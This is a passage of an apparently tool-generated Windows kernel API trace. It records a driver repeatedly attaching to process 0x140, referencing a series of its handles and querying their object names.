KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.962] PsReleaseProcessExitSynchronization () returned 0x2 [0289.962] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40007 [0289.962] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.962] ObfDereferenceObject (Object=0xffffe000696e1890) returned 0x7fff [0289.962] IoCompleteRequest () returned 0x0 [0289.962] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.962] PsAcquireProcessExitSynchronization () returned 0x0 [0289.962] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.962] ObReferenceObjectByHandle (in: Handle=0x190, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000696df6d0, HandleInformation=0x0) returned 0x0 [0289.962] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.962] PsReleaseProcessExitSynchronization () returned 0x2 [0289.962] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40006 [0289.962] ObQueryNameString (in: Object=0xffffe000696df6d0, ObjectNameInfo=0xffffe0006a6fe7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6fe7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.962] ObfDereferenceObject (Object=0xffffe000696df6d0) returned 0x7ffd [0289.962] IoCompleteRequest () returned 0x0 [0289.962] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.962] PsAcquireProcessExitSynchronization () returned 0x0 [0289.962] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.962] ObReferenceObjectByHandle (in: Handle=0x194, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069964390, HandleInformation=0x0) returned 0x0 [0289.962] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.962] PsReleaseProcessExitSynchronization () returned 0x2 [0289.962] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40005 [0289.962] ObQueryNameString (in: Object=0xffffe00069964390, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.962] ObfDereferenceObject (Object=0xffffe00069964390) returned 0x7ffd [0289.962] IoCompleteRequest () returned 0x0 [0289.962] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.962] PsAcquireProcessExitSynchronization () returned 0x0 [0289.962] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.962] ObReferenceObjectByHandle (in: Handle=0x1b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069965ea0, HandleInformation=0x0) returned 0x0 [0289.963] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.963] PsReleaseProcessExitSynchronization () returned 0x2 [0289.963] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40004 [0289.963] ObQueryNameString (in: Object=0xffffe00069965ea0, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.963] ObfDereferenceObject (Object=0xffffe00069965ea0) returned 0x7ff2 [0289.963] IoCompleteRequest () returned 0x0 [0289.963] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.963] PsAcquireProcessExitSynchronization () returned 0x0 [0289.963] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.963] ObReferenceObjectByHandle (in: Handle=0x1c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699a7c20, HandleInformation=0x0) returned 0x0 [0289.963] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.963] PsReleaseProcessExitSynchronization () returned 0x2 [0289.963] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40003 [0289.963] ObQueryNameString (in: Object=0xffffe000699a7c20, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.963] ObfDereferenceObject (Object=0xffffe000699a7c20) returned 0x7ff4 [0289.963] IoCompleteRequest () returned 0x0 [0289.963] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.963] PsAcquireProcessExitSynchronization () returned 0x0 [0289.963] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.963] ObReferenceObjectByHandle (in: Handle=0x1c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699a8f20, HandleInformation=0x0) returned 0x0 [0289.963] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.963] PsReleaseProcessExitSynchronization () returned 0x2 [0289.963] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40002 [0289.963] ObQueryNameString (in: Object=0xffffe000699a8f20, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.963] ObfDereferenceObject (Object=0xffffe000699a8f20) returned 0x7ffd [0289.963] IoCompleteRequest () returned 0x0 [0289.963] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.963] PsAcquireProcessExitSynchronization () returned 0x0 [0289.963] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.963] ObReferenceObjectByHandle (in: Handle=0x1d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699a3880, HandleInformation=0x0) returned 0x0 [0289.963] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.963] PsReleaseProcessExitSynchronization () returned 0x2 [0289.963] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40001 [0289.963] ObQueryNameString (in: Object=0xffffe000699a3880, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.963] ObfDereferenceObject (Object=0xffffe000699a3880) returned 0x7ffd [0289.963] IoCompleteRequest () returned 0x0 [0289.963] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.963] PsAcquireProcessExitSynchronization () returned 0x0 [0289.963] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.963] ObReferenceObjectByHandle (in: Handle=0x1d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699a9380, HandleInformation=0x0) returned 0x0 [0289.963] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.963] PsReleaseProcessExitSynchronization () returned 0x2 [0289.963] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40000 [0289.963] ObQueryNameString (in: Object=0xffffe000699a9380, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.963] ObfDereferenceObject (Object=0xffffe000699a9380) returned 0x7ffd [0289.963] IoCompleteRequest () returned 0x0 [0289.964] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.964] PsAcquireProcessExitSynchronization () returned 0x0 [0289.964] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.964] ObReferenceObjectByHandle (in: Handle=0x1fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a264750, HandleInformation=0x0) returned 0x0 [0289.964] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.964] PsReleaseProcessExitSynchronization () returned 0x2 [0289.964] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3ffff [0289.964] ObQueryNameString (in: Object=0xffffe0006a264750, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.964] ObfDereferenceObject (Object=0xffffe0006a264750) returned 0x7f6f [0289.964] IoCompleteRequest () returned 0x0 [0289.964] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.964] PsAcquireProcessExitSynchronization () returned 0x0 [0289.964] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.964] ObReferenceObjectByHandle (in: Handle=0x244, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a54d8c0, HandleInformation=0x0) returned 0x0 [0289.964] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.964] PsReleaseProcessExitSynchronization () returned 0x2 [0289.964] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3fffe [0289.964] ObQueryNameString (in: Object=0xffffe0006a54d8c0, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.964] ObfDereferenceObject (Object=0xffffe0006a54d8c0) returned 0x7ffb [0289.964] IoCompleteRequest () returned 0x0 [0289.964] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.964] PsAcquireProcessExitSynchronization () returned 0x0 [0289.964] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.964] ObReferenceObjectByHandle (in: Handle=0x258, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b9ef20, HandleInformation=0x0) returned 0x0 [0289.964] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.964] PsReleaseProcessExitSynchronization () returned 0x2 [0289.964] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3fffd [0289.964] ObQueryNameString (in: Object=0xffffe00069b9ef20, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.964] ObfDereferenceObject (Object=0xffffe00069b9ef20) returned 0x7f95 [0289.964] IoCompleteRequest () returned 0x0 [0289.964] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.964] PsAcquireProcessExitSynchronization () returned 0x0 [0289.964] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.964] ObReferenceObjectByHandle (in: Handle=0x2f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a336900, HandleInformation=0x0) returned 0x0 [0289.964] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.964] PsReleaseProcessExitSynchronization () returned 0x2 [0289.964] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3fffc [0289.964] ObQueryNameString (in: Object=0xffffe0006a336900, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.964] ObfDereferenceObject (Object=0xffffe0006a336900) returned 0x800e [0289.965] IoCompleteRequest () returned 0x0 [0289.965] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.965] PsAcquireProcessExitSynchronization () returned 0x0 [0289.965] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.965] ObReferenceObjectByHandle (in: Handle=0x2f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007a69b430, HandleInformation=0x0) returned 0x0 [0289.965] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.965] PsReleaseProcessExitSynchronization () returned 0x2 [0289.965] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3fffb [0289.965] ObQueryNameString (in: Object=0xffffe0007a69b430, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.965] ObfDereferenceObject (Object=0xffffe0007a69b430) returned 0x7ffe [0289.965] IoCompleteRequest () returned 0x0 [0289.965] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.965] PsAcquireProcessExitSynchronization () returned 0x0 [0289.965] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.965] ObReferenceObjectByHandle (in: Handle=0x3f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00076fc3cd0, HandleInformation=0x0) returned 0x0 [0289.965] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.965] PsReleaseProcessExitSynchronization () returned 0x2 [0289.965] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3fffa [0289.965] ObQueryNameString (in: Object=0xffffe00076fc3cd0, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.965] ObfDereferenceObject (Object=0xffffe00076fc3cd0) returned 0x7ffe [0289.965] IoCompleteRequest () returned 0x0 [0289.965] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.965] PsAcquireProcessExitSynchronization () returned 0x0 [0289.965] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.965] ObReferenceObjectByHandle (in: Handle=0x468, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069be7f20, HandleInformation=0x0) returned 0x0 [0289.965] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.965] PsReleaseProcessExitSynchronization () returned 0x2 [0289.965] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3fff9 [0289.965] ObQueryNameString (in: Object=0xffffe00069be7f20, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.965] ObfDereferenceObject (Object=0xffffe00069be7f20) returned 0x800e [0289.965] IoCompleteRequest () returned 0x0 [0289.965] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.965] PsAcquireProcessExitSynchronization () returned 0x0 [0289.965] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.965] ObReferenceObjectByHandle (in: Handle=0x49c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f17270, HandleInformation=0x0) returned 0x0 [0289.965] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.965] PsReleaseProcessExitSynchronization () returned 0x2 [0289.965] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3fff8 [0289.965] ObQueryNameString (in: Object=0xffffe00069f17270, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.965] ObfDereferenceObject (Object=0xffffe00069f17270) returned 0x7ffe [0289.965] IoCompleteRequest () returned 0x0 [0289.966] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.966] PsAcquireProcessExitSynchronization () returned 0x0 [0289.966] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.966] ObReferenceObjectByHandle (in: Handle=0x4e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a627090, HandleInformation=0x0) returned 0x0 [0289.966] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.966] PsReleaseProcessExitSynchronization () returned 0x2 [0289.966] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3fff7 [0289.966] ObQueryNameString (in: Object=0xffffe0006a627090, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.966] ObfDereferenceObject (Object=0xffffe0006a627090) returned 0x7ffa [0289.966] IoCompleteRequest () returned 0x0 [0289.966] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.966] PsAcquireProcessExitSynchronization () returned 0x0 [0289.966] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.966] ObReferenceObjectByHandle (in: Handle=0x4e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069164f20, HandleInformation=0x0) returned 0x0 [0289.966] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.966] PsReleaseProcessExitSynchronization () returned 0x2 [0289.966] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3fff6 [0289.966] ObQueryNameString (in: Object=0xffffe00069164f20, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.966] ObfDereferenceObject (Object=0xffffe00069164f20) returned 0x7ff4 [0289.966] IoCompleteRequest () returned 0x0 [0289.966] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.966] PsAcquireProcessExitSynchronization () returned 0x0 [0289.966] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.966] ObReferenceObjectByHandle (in: Handle=0x4ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691649b0, HandleInformation=0x0) returned 0x0 [0289.966] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.966] PsReleaseProcessExitSynchronization () returned 0x2 [0289.966] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3fff5 [0289.966] ObQueryNameString (in: Object=0xffffe000691649b0, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.966] ObfDereferenceObject (Object=0xffffe000691649b0) returned 0x7ffe [0289.966] IoCompleteRequest () returned 0x0 [0289.966] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.966] PsAcquireProcessExitSynchronization () returned 0x0 [0289.966] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.966] ObReferenceObjectByHandle (in: Handle=0x50c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000725fd930, HandleInformation=0x0) returned 0x0 [0289.966] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.966] PsReleaseProcessExitSynchronization () returned 0x2 [0289.966] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3fff4 [0289.966] ObQueryNameString (in: Object=0xffffe000725fd930, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.966] ObfDereferenceObject (Object=0xffffe000725fd930) returned 0x7f0c [0289.966] IoCompleteRequest () returned 0x0 [0289.966] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.966] PsAcquireProcessExitSynchronization () returned 0x0 [0289.966] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.966] ObReferenceObjectByHandle (in: Handle=0x510, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a48aad0, HandleInformation=0x0) returned 0x0 [0289.967] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.967] PsReleaseProcessExitSynchronization () returned 0x2 [0289.967] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3fff3 [0289.967] ObQueryNameString (in: Object=0xffffe0006a48aad0, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.967] ObfDereferenceObject (Object=0xffffe0006a48aad0) returned 0x7ffc [0289.967] IoCompleteRequest () returned 0x0 [0289.967] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.967] PsAcquireProcessExitSynchronization () returned 0x0 [0289.967] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.967] ObReferenceObjectByHandle (in: Handle=0x54c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a748930, HandleInformation=0x0) returned 0x0 [0289.967] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.967] PsReleaseProcessExitSynchronization () returned 0x2 [0289.967] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3fff2 [0289.967] ObQueryNameString (in: Object=0xffffe0006a748930, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.967] ObfDereferenceObject (Object=0xffffe0006a748930) returned 0x7ffb [0289.967] IoCompleteRequest () returned 0x0 [0289.967] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.967] PsAcquireProcessExitSynchronization () returned 0x0 [0289.967] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.967] ObReferenceObjectByHandle (in: Handle=0x598, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006dfff7a0, HandleInformation=0x0) returned 0x0 [0289.967] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.967] PsReleaseProcessExitSynchronization () returned 0x2 [0289.967] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3fff1 [0289.967] ObQueryNameString (in: Object=0xffffe0006dfff7a0, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.967] ObfDereferenceObject (Object=0xffffe0006dfff7a0) returned 0x800e [0289.967] IoCompleteRequest () returned 0x0 [0289.967] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.967] PsAcquireProcessExitSynchronization () returned 0x0 [0289.967] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.967] ObReferenceObjectByHandle (in: Handle=0x5bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069e41790, HandleInformation=0x0) returned 0x0 [0289.967] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.967] PsReleaseProcessExitSynchronization () returned 0x2 [0289.967] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3fff0 [0289.967] ObQueryNameString (in: Object=0xffffe00069e41790, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.967] ObfDereferenceObject 